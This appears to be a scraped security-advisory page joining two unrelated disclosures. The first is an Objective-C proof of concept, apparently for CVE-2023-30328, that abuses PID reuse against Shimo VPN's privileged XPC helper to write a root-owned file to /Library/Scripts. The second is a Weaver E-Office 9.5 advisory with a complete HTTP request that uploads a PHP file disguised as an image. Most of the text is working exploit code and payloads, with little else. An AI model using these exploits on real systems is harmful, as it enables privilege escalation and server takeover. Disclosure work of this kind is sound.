- (void)setTmpDirPath:(NSString \*)arg1;
- (void)setShimoBundlePath:(NSString \*)arg1;
@end

int main(void) {

    #define RACE\_COUNT 10
    #define kValid "/Applications/Shimo 2.app/Contents/MacOS/Shimo" // HERE
    extern char \*\*environ;

    int pids\[RACE\_COUNT\];
    for (int i = 0; i < RACE\_COUNT; i++)
    {
        int pid = fork();
        if (pid == 0)
        {
        NSString\*  \_serviceName = XPCHelperMachServiceName;
        NSXPCConnection\* \_agentConnection = \[\[NSXPCConnection alloc\] initWithMachServiceName:\_serviceName options:4096\];
        \[\_agentConnection setRemoteObjectInterface:\[NSXPCInterface interfaceWithProtocol:@protocol(ShimoHelperToolProtocol)\]\];
        \[\_agentConnection resume\];

        id obj = \[\_agentConnection remoteObjectProxyWithErrorHandler:^(NSError\* error)
         {
             (void)error;
             NSLog(@"Connection Failure");
         }\];
        NSLog(@"obj: %@", obj);
        NSLog(@"conn: %@", \_agentConnection);
        //get FW state
        NSString\* sudo\_config = @"teststring";
        NSString\* sudo\_path = @"/Library/Scripts/poc.sh";
        
        // - (void)writeConfig:(NSString \*)arg1 atPath:(NSString \*)arg2 withReply:(void (^)(NSError \*))arg3;
        \[obj writeConfig:sudo\_config atPath:sudo\_path withReply:^(NSError \* err){
             NSLog(@"Response: %@", err);
                 }\];
 
        NSLog(@"Done");
        // start PID reuse
        char target\_binary\[\] = kValid;
        char \*target\_argv\[\] = {target\_binary, NULL};
        posix\_spawnattr\_t attr;
        posix\_spawnattr\_init(&attr);
        short flags;
        posix\_spawnattr\_getflags(&attr, &flags);
        flags |= (POSIX\_SPAWN\_SETEXEC | POSIX\_SPAWN\_START\_SUSPENDED);
        posix\_spawnattr\_setflags(&attr, flags);
        posix\_spawn(NULL, target\_binary, NULL, &attr, target\_argv, environ);
        }
        printf("forked %d\\n", pid);
        pids\[i\] = pid;
    }
    // keep the child processes alive
    sleep(10);
    
    cleanup:
    for (int i = 0; i < RACE\_COUNT; i++)
    {
        pids\[i\] && kill(pids\[i\], 9);
    }
}

**POC**

Once the exploit code is executed a file poc.sh has been created

    user@catalina1 exploit % ls -la /Library/Scripts
    total 8
    drwxr-xr-x  11 root  wheel   352 Apr  1 04:40 .
    drwxr-xr-x  66 root  wheel  2112 Aug 30  2021 ..
    drwxr-xr-x  10 root  wheel   320 Aug 24  2019 ColorSync
    drwxr-xr-x  15 root  wheel   480 Aug 24  2019 Folder Action Scripts
    drwxr-xr-x   6 root  wheel   192 Aug 24  2019 Folder Actions
    drwxr-xr-x   7 root  wheel   224 Sep  3  2019 Font Book
    drwxr-xr-x   8 root  wheel   256 Aug 24  2019 Printing Scripts
    drwxr-xr-x  14 root  wheel   448 Aug 24  2019 Script Editor Scripts
    drwxr-xr-x   7 root  wheel   224 Aug 24  2019 UI Element Scripts
    drwxr-xr-x   5 root  wheel   160 Sep 10  2019 VoiceOver
    -rw-r--r--@  1 root  wheel    10 Apr  1 04:40 poc.sh
    

**Recommendation**

Use the audit token instead of process identifier to create the SecCode references. Example Resource

CVE-2023-30328: randomideas/ShimoVPN.md at main · rand0mIdas/randomideas

A vulnerability was found in Weaver E-Office 9.5. It has been rated as critical. Affected by this issue is some unknown functionality of the file App/Ajax/ajax.php?action=mobile_upload_save. The manipulation of the argument upload_quwan leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-228014 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

    POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
    Host: xx:8088
    Content-Length: 338
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    
    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    Content-Disposition: form-data; name="upload_quwan"; filename="1.php@"
    Content-Type: image/jpeg
    
    <?php phpinfo();?>
    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    Content-Disposition: form-data; name="file"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

Tag

#apple